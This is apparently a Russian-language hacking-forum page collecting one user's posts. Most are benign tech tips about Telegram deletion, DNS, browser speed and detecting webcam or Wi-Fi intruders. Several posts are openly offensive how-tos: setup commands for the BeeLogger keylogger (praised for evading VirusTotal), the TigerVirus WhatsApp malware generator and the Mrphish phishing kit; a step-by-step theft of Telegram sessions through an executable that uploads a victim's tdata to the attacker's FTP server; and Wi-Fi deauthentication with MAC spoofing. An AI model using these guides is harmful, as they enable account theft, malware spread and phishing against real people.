Перейти к содержимому


Контент пользователя roguevad

Найдено 147 записей от roguevad (Поиск ограничен от 27-Июнь 23)



#28529 Как самоуничтожить телеграм?

Отправлено по roguevad   06 Май 2022 - 01:25 в Делимся опытом.

QDks814.png

 

Приветствую, хакеры! В данной небольшой статье я хочу расскзать о том, как удалить свой аккаунт в Telegram. Несмотря на печальную славу, Telegram до сих пор очень популярен как мессенджер и как соцсеть. Однако, порой возникает надобность удалиться из соцсети. Например, когда вы меняете СИМ-карту и номер телефона, или когда решаете перейти на другой способ общения.

Итак, таких способа два. Первый способ невозможен без браузера. Заходим на страницу "https://my.telegram....?to=deactivate"(скопируйте и вставьте в строку браузера). Мы попадаем в центр управления аккаунтом.

8gSvzjR.png

 

Вводим свой номер телефона и жмём кнопку "Далее". В ваше приложение на смартфоне придёт уникальный код.

jKxScat.png

 

После того как вы ввели код в окно, появится предупреждение о том, что восстановить переписки и подписки вы не сможете. В пустое поле введите свой номер телефон и причину ухода (необязательно).

CZ2HjIR.png

 

Еще одно предупреждение появится на экране, и после него вы сможете удалить свой аккаунт.

4IFmNsT.png

 

Этот способ пригодиться вам, если вы хотите удалить свой аккаунт Telegram полностью. Однако, есть ещё один способ.

Самоуничтожение аккаунта

В приложении Telegram на смартфоне есть ещё одна интересная функция - самоуничтожение аккаунта после бездействия. Чтобы её активировать, следуйте инструкции:

Заходим в приложение и жмём три полосочки в правом углу, попадаем в меню приложения. Выбираем раздел "Setting" (Настройки), в нём пункт "Privacy and Security" (Конфиденциальность и Безопасность).

ItY2Ara.png

 

В появившемся меню в самом конце ищем пункт "Delete my account" (Удаление моего аккаунта) и выбираем период бездействия. Если вы перестанете заходить в аккаунт и пользоваться им со всех устройств, то он удалится после прошествия этого времени.

D5fJbVU.png

 

Восстановление профиля

Запомните! После удаление профиля в Телеграм вы не сможете восстановить его обратно. Сервис сразу же удаляет аккаунты без возможности восстановления. Единственный способ вернуться в телеграм - зарегистрироваться заново.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




#28330 Как сгенерировать кейлоггер

Отправлено по roguevad   19 Апрель 2022 - 11:54 в Делимся опытом.

k6obr5d.png

 

Приветствую, хакеры! В данной статье я хочу показать вам электронный кейлоггер с открытым исходным кодом. Называется данный кейлоггер Beelogeer ТЫК . По сути, это очень мощный инструмент и скрытый инструмент, который можно замаскировать под фейковое обновление Adobe Flash, документ Word, Pdf или Pptx.

 

Погнали!

 

1. Для установки используем:

   apt install git python

   $ git clone https://github.com/4w4k3/BeeLogger.git

   $ cd BeeLogger

   $ bash install.sh

2. Использование осуществляется по средством ввода следующей команды:

   python bee.py

 

Затем генерируем подходящий нам файл цифрами. При этом, данный кейлоггер VirusTotal почти не детектедит.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28300 Как скачивать торренты на Google Диск

Отправлено по roguevad   03 Апрель 2022 - 01:29 в Делимся опытом.

Приветствую, хакеры! В данной статье я хочу рассказать о том, как скачивать торренты на Google Disk. Любители бесплатного контента прекрасно знают, что Роскомнадзор всеми силами ограничивает доступ к торрентам и их скорости загрузки. Из-за чего пользователям постоянно приходиться искать новый способ обхода ограничений и данный пост не исключение.

 

Сервис Google Colab поможет значительно сэкономить время загрузки, ведь файлы скачиваются прямиком на сервера Google Диска, давая возможность обойти ограничения, наложенные интернет-провайдером и позволяя скачивать контент даже на мобильные устройства, при этом не теряя драгоценную память устройства.

 

Для настройки переходим в Torrents Downloader и нажимаем «Копировать на Диск». В открывшейся странице запускаем код «Google Drive», переходим по появившейся ссылке, копируем полученный код, вставляем его в поле ниже и нажимаем Enter. Запускаем категорию «Зависимость» и дожидаемся окончания загрузки. Ниже запускаем «Один торрент» и вставляем ссылку на торрент файл. И остается лишь запустить категорию «Код».

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28497 Как совместно смотреть YouTube на расстоянии

Отправлено по roguevad   03 Май 2022 - 01:49 в Делимся опытом.

mgGgOfV.png

 

Приветствую, хакеры! В данной статье хочу рассказать вам о том, как вы можете совместно смотреть видео YouTube на расстоянии. Синхронный просмотр видео с различных площадок может понадобиться не только для развлечений, но и для организации совместной работы или обучения на расстоянии, что значительно повысит удобство взаимодействия.

 

Благодаря таким сервисам, как Watch2Gether вы сможете создавать приватные «комнаты» для совместного просмотра видео в режиме реального времени и параллельно общаться с помощью голосового чата или веб-камеры. Сайт не требует регистрации и поддерживает воспроизведение видеороликов не только с YouTube, но и Twitch, Deezer, Vimeo и других площадок.

 

Все что для этого требуется, нажать «Создать свою комнату», после ввести имя и кликнуть «Присоединитесь к комнате». Далее поделиться ссылкой с друзьями, чтобы они смогли присоединиться к просмотру и выбрать нужно видео для воспроизведения.

 

Вот таким вот простым способом вы можете синхронизировать видео на нескольких устройствах и наслаждаться вместе с кем-то просмотром контента.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28473 Как создать вирусное ПО и сообщения для Whatsapp

Отправлено по roguevad   01 Май 2022 - 10:31 в Делимся опытом.

jyYIuEA.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете создать вредоносное программное обеспечение для WhatsApp. Для этого нам понадобится инструмент, который позволяет создавать вирусное программное обеспечение и сообщения для WhatsApp, а также для других приложений. Называется данный инструмент TigerVirus ТЫК .

 

Погнали!

 

1. Для установки используем:

   apt update && apt upgrade

   $ apt install git

   $ git clone https://github.com/D.../TigerVirus.git

   $ cd TigerVirus

2. Запуск осуществляется по средством ввода следующей команды:

   bash TigerVirus.sh

 

После запуска нужно выбирать тип угрозы с помощью цифр, а затем у вас сгенерируется вирусный файл в директории скрипта.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28213 Как создать сайт новичку

Отправлено по roguevad   14 Июль 2021 - 01:05 в Делимся опытом.

Начало

Скачиваем OpenServer по ссылке: Официальный сайт

Программа является бесплатной, для наших целей будет достаточно базовой версии.

Кстати, с офф. сайта скачиваться будет с низкой скоростью - нужно либо задонатить разработчику небольшую сумму, либо скачать с торрента ( я вам про это ничего не говорил).

После скачивания установщика, запускаем его. Выбираем папку, в которую будет распакована программа, нажимаем «ОК».

 

После завершения распаковки, переходим в папку, которую выбрали в процессе. Запускаем программу.

Выбираем язык, который будет предложен вам.

Если программа запускается впервые, Вам могут предложить установить патчи для Microsoft Visual C++.

В трее у вас появится флажок.Нажимаем правой кнопкой - настройки.

в разделе модули выставляем +- такие версии PHP,MySQL.

b63a3fa184b240ce96d9c.png

 

Сохраняем, после этого запускаем сервер. Нажимаем правой кнопкой - Запуск.

После успешного запуска цвет должен поменяться на зелёный.

dcc9c1e3dabc6cb0cd7f7.png

 

В разделе дополнительно открываем PhpMyAdmin.

Логин: root

Пароль: root

Или:

Логин: mysql

Пароль: mysql

или:

Логин: root

Пароль пустой

Так же можно попробовать mysql mysql

 

9198691a4af92c5385eb5.png

 

Создадим БД для нашего будущего сайта. Нажимаем Создать БД

4f564823231bfef13dead.png

 

Вводим имя БД на латинице.Выбираем в правой колонке utf8_general_ci, и нажимаем создать.

f5dd39c6dcc7653a2ee6b.png

 

 

Установка WordPress

Переходим по ссылке и скачиваем WP.

c29a4c423fb513970920f.png

 

После завершения скачивания, переходим в папку с OpenServer - domains

Здесь создаём папку под ваш сайт с необходимым названием (primer, primer.com, primer-saita.ru и тд)

 

Если вам неважно название, то можно использовать уже находящуюся папку localhost (перед этим удалите файлы в ней).

Содержимое архива с WordPress распаковываем в папку которую создали/localhost.

ab01ae73bc504a57e57e0.png

 

теперь перезапускаем OpenServer

7b8f3ba18b9cd77bb1cda.png

 

После этого, в разделе мои проекты вы увидите вашу папку сайта:

переходим по ней

47976810923664730ddbc.png

 

Откроется окно настройки WP. нажимаем вперёд:

5a482c6284d5ad7c1eac3.png

 

Если вы хотите создать другую учётку, то в MySQL выбираем учетные записи пользователей - добавить, указываем имя, пароль, и повторно вводим пароль для проверки.

Вводим имя БД, которую создавали в MySQL. Вводим имя и пароль учётки от БД, остальное не трогаем.

Запускаем установку и указываем название для нашего сайта, логин и пароль для учетки в WP, Email.

Выполняем вход. Готово! мы в админке. Теперь можем менять внешний вид сайта, заполнять контентом и т.д

 

 

 




#28464 Как справиться с кибератакой

Отправлено по roguevad   30 Апрель 2022 - 01:41 в Делимся опытом.

gFvqNLs.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как вы можете справляться с различными кибератаками используя очень интересный софт. DataGrain RUMA — решение от компании Crosstech Solutions Group, которое позволяет эффективно справляться с любыми кибератаками, анализируя как внешние угрозы (утечка данных, наличие уязвимостей и т.д.) так и внутреннее (инсайдерская деятельность, злоупотребление правами). Система работает в упреждающей режиме и выявляет сомнительную деятельность и аномалии ещё на раннем этапе, а помогает в этом поведенческий алгоритм по фиксации любого отклонения относительно нормального поведения.

 

В связке с традиционными средствами защиты информации, DataGrain RUMA позволяет фиксировать попытки любых кибератак и успешно предотвращать их: СЗИ просто предоставляется информация о выявленных аномалиях из RUMA, на базе которых срабатывает тот или иной процесс по защите информационной безопасности, соответствующий текущей угрозе. Поэтому использование данного решения просто незаменимо, если вы хотите получить максимальную безопасность от кибератак.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28269 Как точечно искать файлы в интернете

Отправлено по roguevad   30 Сентябрь 2021 - 01:55 в Делимся опытом.

Приветствую, хакеры! В данной статье хочу рассказать о способе поиска информации. Ведь кто владеет информацией, тот владеет миром — это знают все. И в наше время она доступна как никогда. Это дар и проклятие одновременно. Информации слишком много — чтобы найти необходимую, часто уходит колоссальное количество времени. Задачу можно облегчить. Нужен фильтр!

 

— это очень мощная система индексирования и поиска, позволяющая находить файл среди миллионов расположенных на веб-серверах. База данных ежедневно обновляется нейросетями, которые сканируют интернет-ресурсы. По сути — это поисковик для файлов.

 

Больше не придется тратить время на бесконечный серфинг сайтов. Есть другой путь: файлы можно искать в православном Google. Все, что нужно, — ввести в строку поиска команду «filetype:», где после двоеточия указаны тип файла и ключевые слова. Например, если вбить «filetype:pdf мастер и маргарита булгаков», Google выдаст культовый роман в формате .pdf.

Отличный сервис, который отлично подойдет тем, кто часто работает с огромным количеством информации. Это сильно облегчит вам работу с различными данными. Пользуйтесь!

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.




#28518 Как убрать фон с картинки за пару секунд

Отправлено по roguevad   05 Май 2022 - 01:13 в Делимся опытом.

uOx98G8.png

 

Приветствую, хакеры! В данной небольшой статье я расскажу о том, как быстро удалить фон с картинки, это займет буквально несколько секунд вашего времени. Для удаления фона изображения профессионалы используют специальные маски,  инструменты Фотошопа и кучу других мудрёных способов. Но ведь не все мы профессионалы, и уже есть сервисы с ИИ, которые за пару секунд удалят вам фон. Даже можно будет сразу добавить нужный цвет или картинку в качестве фона.

 

Sticker Mule 2 — бесплатный сервис для удаления фона картинок. Для начала нужно зарегистрироваться, а затем загрузить или перетащить картинку. Здесь же сразу можно добавить любой фон в виде картинки или нужного цвета. Можно обрезать полученное изображение до нужного размера. Удобно.

 

remove.bg — не менее удобный сервис для удаления фона с картинки. Здесь без регистрации. Как и в первом сервисе, можно сразу отредактировать нужный фон. Для постоянного пользования лучше оформить подписку, но для разовых случаев он бесплатный. Есть API для Windows / Mac / Linux и сторонних приложений.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28227 Как узнать есть ли вирус на флешке

Отправлено по roguevad   10 Август 2021 - 10:38 в Делимся опытом.

Приветствую, хакеры! В этой статье я вам расскажу о методе, который позволит узнать вам есть ли вирус на вашей флешке. Суть метода заключается в создании иконки для флешки со специальным файлом. Если на флешку попадет вирус то он перепишет файл и наша иконка пропадет, тем самым мы поймем, что поймали вирус и сможем его без каких-либо проблем удалить.

1. Создаем на флешке текстовый документ, затем переименовываем его в autorun.inf

 

2. Далее находим иконку в интернете или создаем свою с размером 64х64. Скачать можно тут, сделать иконку тут

 

3. Открываем файл autorun.inf через блокнот и пишем:

[autorun]

icon=1.ico

где вместо "1" должно быть написано имя выбранной вами иконки. Сохраняем и закрываем autorun.inf

 

4. Теперь копируем иконку на флешку

 

5. Закрываем флешку, вытаскиваем и вставляем обратно. 

Если на вашу флешку попадет вирус, то он перепишет autorun.inf и ваша иконка не будет отображаться - это и будет признаком вируса, после этого ее можно форматировать и избавлять от любого вируса, что обеспечит вам безопасность данных.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28321 Как узнать кто взломал WiFi Вычисляем взломщика просто

Отправлено по roguevad   15 Апрель 2022 - 11:22 в Делимся опытом.

Приветствую, хакеры! Я хочу вам рассказать об одном способе вычислить хакера, который взломал Вашу WiFi сеть. Ну или не хакера, можно просто вычислить точное местоположение любого устройства, которое подключено к WiFi сети.

Использовать будем принцип амплитудной радиопеленгации. Звучит страшно, но делается очень просто.

Нам понадобится:

  • Ноут с Kali Linux / Смартфон с Kali Nethunter или Andrax / Или любой другой работающий Linux
  • USB WiFi Адаптер. Желательно в виде USB флешки
  • Металлическая банка из под кофе или энергетика (желательно с плоским дном)

Я буду использовать Xiaomi Redmi 3X с Kali Nethunter и кастомным ядром, и адаптер D-Link DWA-160 ver. C1.

Сначала сделаем подобие антенны с узкой диаграммой направленности.

  1. Берем банку и отрезаем у неё верхнюю часть.
  2. 2. На расстоянии 3 сантиметра от дна проделываем дырку в банке.
  3. 3. Засовываем в эту дырку наш USB WiFi адаптер, закрепляем изолентой и клеевым пистолетом.

Переходим к вычислению нашего Хакера

0. Отключаем ВСЕ наши устройства от WiFi сети, чтоб не запутаться.

1. Подключаем USB WiFi адаптер в ноут / смартфон с Kali Linux и в терминале под рутом выполняем:

Подготавливаем систему к работе в режиме монитора: airmon-ng check kill

Смотрим какой адаптер у нас отвечает за WiFi: ifconfig или ip a У меня это wlan1.

Запускаем режим монитора на выбранном сетевом адаптере: airmon-ng start wlan1

Запускаем сканирование и ищем нашу сеть. Нас интересует точное название и канал в столбце “CH”: airodump-ng wlan1mon

Жмем CTRL+C для остановки сканирования.

И снова запускаем сканирование, но теперь добавив название сети и канал:

Bash:

airodump-ng wlan1mon – essid Protected0x41 – channel 1

В столбце STATIONS мы увидим всех клиентов, которые подключены к этой сети. Мы ведь отключили все свои устройства? Отлично.

Смотрим на уровень сигнала смартфона Хакера в столбце PWR. Чем ближе число к -100 – тем сигнал слабее, чем ближе к 0, тем сигнал сильнее.

Ну и ходим теперь по всей квартире/дому, направляем антенну в разные стороны и смотрим на уровень сигнала. Я нашел квартиру, со стороны которой сигнал -50, а это очень высокий уровень сигнала.

Хакер вычислен. Надеюсь кому-нибудь пригодится.​

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28282 Как узнать кто слил ваши документы или фото в сеть

Отправлено по roguevad   15 Март 2022 - 10:33 в Делимся опытом.

Приветствую, хакеры! В данной небольшой статье, я хочу рассказать вам о том, как обнаружить в интернете утечку ваших личных документов или фотографий. Представьте ситуацию: вы отправляете кому-то или загружайте на какой либо сервис документ, содержащий личную информацию, а потом обнаруживаете, что он утек в сеть. Как найти источник утечки?

 

Как говорится, доверяй, но проверяй. LeaksID — сервис, позволяющий маркировать конфиденциальные документы невидимыми метками. В случае утечки (даже в виде скриншота или распечатки) сервис проведёт анализ и вычислит источник утечки. Можно юзать как просто онлайн конвертер документов, и на выходе получать защищенный PDF с невидимой маркировкой, что позволит в любой момент узнать где оказался ваш документ и позволит как-то действовать на основе этой информации.

 

Дополнительные плюшки - хранилище документов внутри платформы и возможность совершать любые необходимые манипуляции: скачивать, просматривать, пускать на печать, делиться ссылкой на файл. Поддерживает все популярные форматы. Бесплатно для частных юзеров и платно для компаний.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28292 Как узнать, кто подключен к вашему Wi-Fi!

Отправлено по roguevad   24 Март 2022 - 10:51 в Делимся опытом.

Приветствую, хакеры! В данной небольшой статье расскажу о том, как узнать кто подключен к вашей Wi-Fi сети. Бывают ситуации, что скорость вашего интернета замедлилась и нужно выяснить: это проблема в работе провайдера или расход вашего трафика шустрым соседом, отгадавшим пароль от Wi-Fi.

 

Fing для iOS и Android - сетевой сканер, который показывает информацию об устройствах в любой сети, к которой вы подключены: будь то ваша личная домашняя сеть или общественный Wi-Fi. 

 

Сервис идентифицирует устройства, благодаря запатентованной технологии, используемой также производителями маршрутизаторов и антивирусными компаниями во всем мире. Программа показывает IP-адрес, данные о марке, модели и MAC-адресе каждого подключенного устройства.

 

Кроме того, Fing сможет уведомить вас о новых подключения к сети, поможет узнать скорость интернета и обнаружить скрытые камеры в номере, в котором вы остановились. Приложение также покажет пинг устройства, открытые порты и многое другое, что позволит вам проверить безопасность сети.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28244 Как узнать, кто тайно использует вашу веб-камеру

Отправлено по roguevad   28 Август 2021 - 09:02 в Делимся опытом.

Приветствую, хакеры! В данной статье хочу рассказать о том, как узнать кто использует вашу камеру. Ведь получив доступ к вашей веб-камере, злоумышленник может представлять серьезную угрозу вашей личной жизни. Хорошая новость в том, что управлять камерой так, чтобы никто не догадался, очень сложно. Одним из способов проверить, какие программы используют веб-камеру вашего компьютера — утилита Procesed Explorer от Microsoft.

 

Для начала понадобиться узнать физическое имя нашей веб-камеры. Откроем диспетчер устройств (Win + R) и выполним команду devmgmt.msc. В устройствах обработки изображения, открываем свойства веб-камеры. На вкладке «Сведения» в выпадающем списки находим «Имя объекта физического устройства» и копируем появившееся значение.

 

Скачав и запустив программу от имени администратора, в поиске (Ctrl + F) вставляем имя нашей веб-камеры и нажимаем «Search». В списке отражаться все процессы использующие нашу веб-камеру. Нажав ПКМ и выбрав «Properties» можно просмотреть подробные свойства выбранного процесса и завершить его при необходимости.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28306 Как ускорить интернет на Android

Отправлено по roguevad   09 Апрель 2022 - 12:22 в Делимся опытом.

A4DLLWi.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как ускорить работу интернета на Android. Скорость мобильного интернета зависит не только от мобильного оператора и тарифа. К какому серверу вы подключены — вот что тоже играет роль. Причём немаленькую! Знаете что-нибудь про Cloudflare? Это американская компания, предоставляющая услуги CDN, защиту от DDoS-атак, безопасный доступ к ресурсам и серверы DNS.

 

Нас интересует последнее! По результатам многих текстов сервера Cloudflare считаются самыми быстрыми в мире. И что особенно приятно: у них есть DNS-over-TLS, который позволяет установить Cloudflare DNS без постороннего ПО.

 

1. Открываем «Настройки»;

2. Переходим в настройки DNS «Сеть и интернет» «Дополнительно» «Приватный DNS»;

3. Активируем режим, который позволяет вписать адрес;

4. Прописываем «1dot1dot1dot1.cloudflare-dns.com»;

5. Нажимаем «Сохранить»;

6. Чтобы проверить правильность настроек, переходим на https://1.1.1.1/help и проверяем поле «Using DNS over TLS (DoT)». Если там стоит «Yes», значит, вы всё сделали правильно;

7. Поздравляю, вы великолепны!

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28336 Как ускорить поиск при слабом интернете

Отправлено по roguevad   20 Апрель 2022 - 01:03 в Делимся опытом.

Приветствую, хакеры! Для выполнения качественного пентеста беспроводных точек доступа необходимо приобрести пару USB-адаптеров Wi-Fi с подходящими чипами и доработать их. Подключить вместо штатных направленные внешние антенны для вардрайвинга и повысить мощность передатчика, увеличив значение txpower.

Скрытое имя беспроводной сети и фильтрация клиентов по MAC-адресам слабо препятствуют ее взлому. SSID и подходящие адреса из «белого списка» легко узнать, просто дождавшись очередного хендшейка или сразу выполнив атаку деавторизации. О том как узнать имя скрытой WiFi-сети и как обойти фильтрацию по MAC мы и поговорим в этой статье.

 

Имя беспроводной сети (SSID или ESSID) иногда специально скрывают для ее защиты. Действительно, так отсекаются неофиты и поток желающих подключиться к AP заметно уменьшается: если цель не видно, многие ее не атакуют. Однако узнать SSID довольно просто: эта информация постоянно транслируется в эфир.

Каждый клиент указывает в «рукопожатии» имя сети (SSID), ее цифровой идентификатор (BSSID, обычно совпадает с MAC AP) и свой MAC-адрес. Поэтому атака деавторизации успешно используется для выяснения SSID скрытых сетей. Если удастся перехватить хендшейк при подключении легального клиента к выбранной точке доступа, то мы сразу узнаем ее имя. Достаточно написать простейшую команду и подождать.

   airodump-ng wlan1

Подразумевается, что ваш адаптер для вардрайвинга определяется как wlan1, его мощность уже увеличена, а сам он переключен в режим монитора. Если еще нет, то просто выруби его (ifconfig wlan1 down), и airodump-ng сам переведет его в monitor mode.

Ждать хендшейка неопределенно долго, поэтому давайте ускорим процесс. Откроем второе окно терминала и отправим в нем широковещательную команду деавторизации, заставив всех клиентов выбранной AP заново подключиться и прокричать ее SSID на весь эфир.

   aireplay-ng -0 5 -a D8:FE:E3:XX:XX:XX wlan1

Этой командой мы отправили пять пакетов deauth всем клиентам точки доступа с MAC-адресом D8:FE:E3:и так далее (часть адреса, как обычно, скрываю, наслаждаясь паранойей). Результат незаставил себя ждать.

2BwQoFC.png

 

Буквально сразу в основном окне airodump-ng появилось имя сети. Пока оно было скрыто, вместо имени отображалась его длина (в данном примере — шесть символов).

 

Как обойти фильтрацию по MAC-адресу

Дополнительно админы создают белые списки беспроводных устройств, разрешая подключаться только девайсам c определенными MAC-адресами. В режиме фильтрации по MAC точка доступа откажет в авторизации посторонним устройствам, даже если от них получен верный пароль.

Однако нам важно другое: если клиентское устройство соединилось с выбранной точкой доступа, значит, оно гарантированно есть в ее «белом списке». Осталось кикнуть его прочь с целевой AP и присвоить его (открыто передаваемый в эфир) MAC-адрес своему адаптеру Wi-Fi. Чтобы успеть подключиться вместо доверенного девайса, команду деавторизации лучше запустить параллельно в другом окне терминала и отправлять их со второго донгла. Вот как это выглядит поэтапно на AP из примера выше.

  1. Поднимаем мощность адаптера, маскируем его MAC-адрес и переводим в режим монитора.
  2. Слушаем эфир:

   airodump-ng wlan1

В таблице будут отображаться точки доступа и MAC-адреса подключенных к ним клиентов (см. столбец «STATION» напротив нужной AP).

u5YPbUt.png

 

3. Присваиваем одному из своих донглов этот MAC-адрес

   macchanger --mac=64:DB:43:XX:XX:XX wlan1

4. Со второго адаптера шлем пакеты деавторизации:

   aireplay-ng -0 5 -a D8:FE:E3:XX:XX:XX wlan1

5. Подключаемся первым адаптером, как тольконастоящий клиент отрубится от AP

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28611 Как ускорить работу браузера?

Отправлено по roguevad   13 Май 2022 - 01:04 в Делимся опытом.

JnjUAgC.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как вы можете ускорить работу своего браузера. Со временем браузер начинает притормаживать даже на самых мощных компьютерах. Стандартные действия очистить кэш и удалить ненужные расширения, конечно, помогают ситуации, но можно попробовать и более экстравагантные методы.

 

Причиной замедления скорости работы браузера может стать излишняя фрагментация баз данных профиля. Бесплатная утилита SpeedyFox предназначена для решения этой проблемы - сжимает базы данных без потери фактических данных. Базы начинают работать быстрее и занимают меньше места на диске.

 

После запуска утилита автоматически определяет установленные программы и их профили. Если у вас несколько программ и/или их профилей, то можете выбрать именно те, которые хотели бы оптимизировать. Для запуска оптимизации просто нажмите кнопку «Optimize!».

 

Скачать

 

Поэтому если вам необходимо немного повысить производительность своего компьютера, то рекомендую опробовать данную программу.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28260 Как устранить подлагивания смартфона

Отправлено по roguevad   10 Сентябрь 2021 - 12:27 в Делимся опытом.

Приветствую, хакеры! Я уверен, что каждый знает о том, что со временем мобильные устройства начинают слегка подтормаживать, работать гораздо медленнее или даже нагреваться от незначительной нагрузки. Вероятнее всего, это связано с фоновыми процессами приложений, которые безжалостно пожирают ресурсы смартфона. Но это можно исправить!

 

Чтобы облегчить своем устройству работу, переходим в настройки, затем в пункт «Батарея» и открываем «Запуск приложений». Здесь, в зависимости от личных предпочтений, выбираем какие права предоставить каждому приложению: «Автозапуск», «Косвенный запуск» или «Работа в фоновом режиме».

 

Если вы случайно ограничите права нужного приложения, то вовсе не требуется возвращаться к настройкам, ведь оно само попросит разрешение в диалоговом окне. Так же не стоит забывать, что в различных операционных системах названия и пути могут отличаться. Очень рекомендую сделать это, вы ощутите серьезный прирост производительности вашего смартфона. Особенно если дело касается старых моделей телефонов.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28635 Как шифровать SMS-сообщения?

Отправлено по roguevad   15 Май 2022 - 02:25 в Делимся опытом.

oNbyQME.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете зашифровать свои SMS-сообщения. Хоть мы редко переписываемся через SMS, они очень выручают, когда нет интернета — SMS можно отправлять даже без сети, например, если вы за городом. Но у этого способа есть свои проблемы — перехватить SMS в три раза проще, чем взломать мессенджер.

 

Тогда на помощь придёт приложение Silence для Android. Оно выглядит как обычный мессенджер, но с его помощью вы сможете отправлять SMS-сообщения и делиться медиафайлами с полной конфиденциальностью, насколько это вообще возможно. Есть один нюанс: адресат тоже должен установить утилиту.

 

Здесь используется надёжный протокол шифрования Signal, а исходный код открытый, чтобы вы могли убедиться в безопасности программы. Её можно установить в Google Play. В общем, она пригодится в случае, когда отправить сообщение остаётся только через SMS и важно сохранить конфиденциальность переписки.

 

Поэтому если вы часто используете SMS-сообщения и хотите повысить свою анонимность и безопасность, то однозначно рекомендую пользоваться данной программой.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28634 Крадем чужие сессии в Telegram

Отправлено по roguevad   15 Май 2022 - 01:48 в Делимся опытом.

iXWfHBE.png

 

Приветствую, хакеры! Перед вами простой алгоритм действий, который позволит «угнать» чужую телегу.

 

1. Загружаем следующий файл с github;

2. Устанавливаем Python 3.8.2;

3. Устанавливаем редактор кода: Visual Studio Code

4. Регистрируемся на любом удобном FTP сервере;

5. Открываем файл с помощью редактора кода и вводим свои данные в код (хост, логин, пароль FTP и т.д.);

6. Компилируем код Python в исполняемый файл. Для этого используется auto-py-to-exe;

7. Отправляем готовый .exe нашей жертве. В итоге мы получим 2 файла .zip на своем FTP-сервере;

8. Скачиваем Telegram Portable и запусткаем его;

9. Открываем папку «tdata», которая появится в Telegram. У нас появится папка «D877F783D5D3EF8C», открываем ее заменяем  map0 или map1 на файлы с вашего сервера «tdata.zip»;

10. Снова открываем «tdata» и находим файл «D877F783D5D3EF8C», после чего удаляем его. Теперь переносим аналогичный файл из нашего «tdata1.zip» или «tdata2.zip»;

11. Запускаем Telegram Portable. Если все сделано правильно, мы получим доступ к аккаунту жертвы;

12. Поздравляю, вы великолепны!

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28288 Крутейший мультитул для фишинга!

Отправлено по roguevad   19 Март 2022 - 01:07 в Делимся опытом.

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам про новый скрипт на основе bash, который был создан для фишинга учетных записей социальных сетей. Данный скрипт называется Mrphish ТЫК . Отличительной чертой инструмента является то, что он работает, как на устройствах Android с root-доступом, так и на устройстве Android без рута.

 

Погнали!

 

1. Для установки используем:

   apt-get update -y

   apt-get upgrade -y

   pkg install python -y

   pkg install python2 -y

   pkg install git -y

   pip install lolcat

   git clone https://github.com/n...hackers/mrphish

   cd $HOME

   cd mrphish

   bash setup

   bash mrphish

 

2. После установки, от вас требуется только выбрать необходимую социальную сеть и прислать ссылку жертве.

 

Считаю, что это один из самых удобный и простых в освоении инструментов для фишинга. Существуют варианты намного более мощные и функциональные, однако данный скрипт наиболее прост в понимании и подойдет для использования даже новичкам. Поэтому если вы только развиваетесь в данном направлении, то это будет отличный выбор.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28343 Находим вирус удаленного доступа на ПК

Отправлено по roguevad   21 Апрель 2022 - 08:46 в Делимся опытом.

3dVH6QF.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете обнаружить и уничтожить вирусы удаленного доступа. Как известно, антивирусы не всегда палят вредоносы, а полное удаление вируса тоже не всегда помогает. Поэтому воспользуемся командной строкой и узнаем, управляет ли кто-то нашей системой помимо нас. Итак, приступим

 

1. Открываем командную строку от имени администратора;

2. Переходим в директорию нашего юзера с помощью команды cd C:\Users\Имя вашего профиля;

3. Далее прописываем команду netstat -b;

4. У нас появятся все активные подключения ваших программ, а также их IP адреса. Если видим незнакомый процесс, то гуглим информацию по нему. Если убедились, что это вредонос, тогда прописываем следующие команды:

netstat -nbo

taskkill /pid PID ВАШЕГО ФАЙЛА /F

4. Поздравляю, вы великолепны!

 

Если вы обнаружили вирус, вы также увидите IP адрес прокси-сервера, через который он имеет доступ к вашему ПК, а значит сможете как-то воздействовать на него, тем самым еще сильнее укрепив свою позицию.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28204 Немного о безопасности Qiwi терминалов

Отправлено по roguevad   30 Июнь 2021 - 12:36 в Делимся опытом.

